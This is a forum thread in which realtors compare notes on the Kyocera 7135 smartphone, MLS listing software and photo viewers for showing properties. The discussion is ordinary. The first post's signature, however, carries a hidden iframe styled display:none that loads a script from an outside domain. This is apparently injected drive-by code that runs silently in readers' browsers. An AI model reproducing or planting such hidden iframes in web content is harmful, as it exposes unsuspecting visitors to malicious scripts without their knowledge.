+ Reply to Thread

Realtors using the 7135 how is it working

I'am a Realtor in Syracuse NY, If there are any Realtors out there using the 7135 could you tell me how it is working for you, with your MLS system are you using Passport, MLxchange, and are you set up with wiresless PocketRealestate with your Board. I plan to get the 7135 as soon as verzion comes out with it. You can e-mail me at wlocke@twcny.rr.com or just post it on this site.

Thanks
    Bill Locke<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

DSW
    As a real estate consultant/appraiser but not a Realtor I'm not specifically familiar with that system. Does it pull up price / pictures / rents / etc.? That would rock! It would be really great to integrate it into Geograhic Information Systems (GIS)

:topic-off What do you think of DestiNY USA?

ooohhh..

Hey.. you're someone that would know the answer to this...

Over the weekend I grabbed every pqa I could find that would let me look up houses for my 6035 and couldn't find anything that worked.

Is there anything other than pocketrealestate, which seems to cost $159 a year that can be used to pull up house listings by mere individuals that are looking for a house?

Thanks!

Kirby
    -- Everything I say is pure speculation.

Originally posted by DSW
    As a real estate consultant/appraiser but not a Realtor I'm not specifically familiar with that system. Does it pull up price / pictures / rents / etc.? That would rock! It would be really great to integrate it into Geograhic Information Systems (GIS)

:topic-off What do you think of DestiNY USA?

Yes, Pasport is the system we are using now but are upgrading to the MLxchange internet based program that gives you pictures, prices, driving directions,up to 8 pictures of the home, also pages you,or sends a e-mail of updated or new property listings to you,and you can also sent up a web page for the client to view listings just for them to look at.

DestiNY Mall? They haven't even started yet don't know when but it will be good for the area

Bill

Originally posted by kvandivo
    ooohhh..

Hey.. you're someone that would know the answer to this...

Over the weekend I grabbed every pqa I could find that would let me look up houses for my 6035 and couldn't find anything that worked.

Is there anything other than pocketrealestate, which seems to cost $159 a year that can be used to pull up house listings by mere individuals that are looking for a house?

Thanks!

Kirby
    My Palm515 is with the e-Key with the GSAR Realtors of Syracuse NY we have the MLS system (Multi-Listing System) I do not get pictures on my palm but with the 6035 that you have, you can go
    to www.realtor.com for listings with pictures,prices, driving directions and details about the home.

Bill

Note to Kirby, Pocket Real Estate is not an application for the public to access MLS listings. Only MLS member real estate agents and brokers can use it.

Pocket Real Estate is a software program for real estate agents and brokers, Realtors. It allows us to download current MLS listings, in an abreviated version, to a palm or pocket pc. It's available from http://www.PocketRealEstate.com.

I just started to use PRE, the download version, on a Sony Clie. It's promising. Searches are a little slow. Showing information is incomplete, at least with my MLS.

I'm a Realtor anxiously awaiting Verizon's release of the Kyocera 7135. I'd love to have one device to carry rather than two, a cell phone and an palm.

I'd appreciated feedback from other Realtors about their experience with the Kyo 7135.

If you use it with Pocket Real Estate, too, your feedback would be especially of interest.

Does anyone use PRE's new wireless version with a 7135? How well does it work?

How well does the 7135 work with OnlineAgent, Top Producer, Goldmine, ACT, or other contact management databases?

Realtors using Kyocera 7135 Smartphone

Realtors like us are using the Kyocera 7135 Smartphone to better serve our Clients... and have fun doing it!.
    Cheers!

Frostie Dog

I tested PocketRealestate for our MLS on my 6035 and on a HP pocket PC. The Palm device was so much faster, I could do a search, find a listing, make an appointment while the pocket PC was still loading. Can't wait to use it on the 7135

I work for ReMax In Montreal and have this fantastic phone since it came out on Altell, I use it as my phone , pager and palm,i have splash photo for showing pictures of listings, pixscreen for 360 degres on the palm,and sync my agenda,contact and few listings info on a software that i am the director of developped for the last 4 years www.prospects.com

Marc-Andre

Marc-Andre

Are you using PocketRealEstate, and which system are you using Passport, Mlxchange,Steller

Bill

Ya.. I had noticed that pocketrealestate was for "professionals". It seems to me, though, that there would be a PQA out there that mere "mortals" could use. I've used my 6035 to connect to realtor.com, but due to screen size it really isn't a very pleasing experience at all, and this just seems like something that they would have a PQA for. Oh well..

Kirby
    -- Everything I say is pure speculation.

I find it's quick and easy to create a folder within the Photosuite Mobile named after a property, load the property photos in to it for a quick pitch/slideshow of the property to other Realtors and prospects. I'll have to whip it out at a listing presentation sometime.
    Cheers!

Frostie Dog

Nice size in hand & fits well in shirt pocket

My local Verizon store had a demo 7135 I was able to hold. I like the size. It fits easily in my hand and into a shirt pocket.

I'd appreciate feedback from Realtors in the group who use a 7135. Have you used it with Pocket Real Estate, Top Producer, Online Agent, or GoldMine for Real Estate?

Is a Kyo 7135 a good productivity tool for Realtors?

Thanks,

Steve

Big time good tool. I'm using it with ACT! but I understand it does well with Top Producer as any other palm. I really like to carry less on my belt when showing property etc. It also impresses Clients when I show them color slides of their home on the photosuite ap. That way you always have your listings with you!
    Cheers!

Frostie Dog

Realtor in Seattle WA. I do have the 7135. Our MLS actually has a Palm site which allows us to search via the web on the 7135. Our company, Windermere, also has a great feature on their website that allows you to set up a search then download those listings to your palm, which you can then open up and search. It includes picture and map. My only problem is with this damn Mobile PhotoSuite program that came with the 7135. It seems I have to load any pictures on the SD card in the Launcher flolder and can't use any sub-folders or the program can't find them. ANyone use a different app that works better?

As for the person asking about search listings for the general public. You can go to www.homes.com and look at there mobile software.
    Chris Mattix
    Personal Real Estate Consultant

Originally posted by mattixc
    Realtor in Seattle WA. I do have the 7135. Our MLS actually has a Palm site which allows us to search via the web on the 7135. Our company, Windermere, also has a great feature on their website that allows you to set up a search then download those listings to your palm, which you can then open up and search. It includes picture and map. My only problem is with this damn Mobile PhotoSuite program that came with the 7135. It seems I have to load any pictures on the SD card in the Launcher flolder and can't use any sub-folders or the program can't find them. ANyone use a different app that works better?

As for the person asking about search listings for the general public. You can go to www.homes.com and look at there mobile software.

Mattixc, Have you tried the sister program to photosuite called photoview? Its an option when you install the photosuite from the 7135 CD which allows you to view standard jpgs images from any subfolder within the DCIM folder on the SD card. I don't use it myself yet, But now that I've read this thread once again....I have this urge to put all the photo's I took of my future house into a DCIMHouseBefore folder and when I get done sprucing it up I will take the same shots to make an DCIMHouseAfter folder.
    I'll post my results of course
    iPhone therefore iAm.

Steve,

Yes, I have PhotoView installed and have created a folder on the SD card called DCIM and put my jpg files in it and photoview says there are no photos on the card. I have been able to since get PhotoSuite to see the jpgs on the card but only if they are in the Launcher folder alone. It won't see them if I create a sub-folder in Launcher or if I create the "DCIM" folder in either the Palm folder or Laucher. Therefore I can't sperate my jpgs at all. They all have to be in the Launcher folder.
    Chris Mattix

Originally posted by mattixc
    It won't see them if I create a sub-folder in Launcher or if I create the "DCIM" folder in either the Palm folder or Laucher.
    The DCIM folder needs to be in the root of the SD card (on the same level as the PALM and AUDIO folders) in order for PhotoView to see the stuff in it.

Just created the DCIM folder in the same level as the AUDIO and PALM and moved the jpgs to that file. Tried to open PhotoView and it still says no files found on card. I also tried PhotoSuite to see if it could still see the files now in the new DCIM folder and it couldn't. Maybe I'm doing something wrong, but I don't think so.
    Chris Mattix

Hi Everyone.. Realtor here using TopProduceronline with my 7135 and it actually works pretty good.
    I also have an IntranetSite so I can see all my clients, listing and sales do list, my calendar, my tasks, and my outlook names.

One thing topproducer doesn't do is allow you to click on a phone number and dial it ..real pain in the butt.
    what you have to do is to go into edit mode and then highlight it and then dial it.
    TERRIBLE... hope it changes soon.
    I have learned to copy everything into a task and it is much quicker and easier to view the whole list of clients and mark the phone number.
    If you have any better solutions post a suggestion ..thanks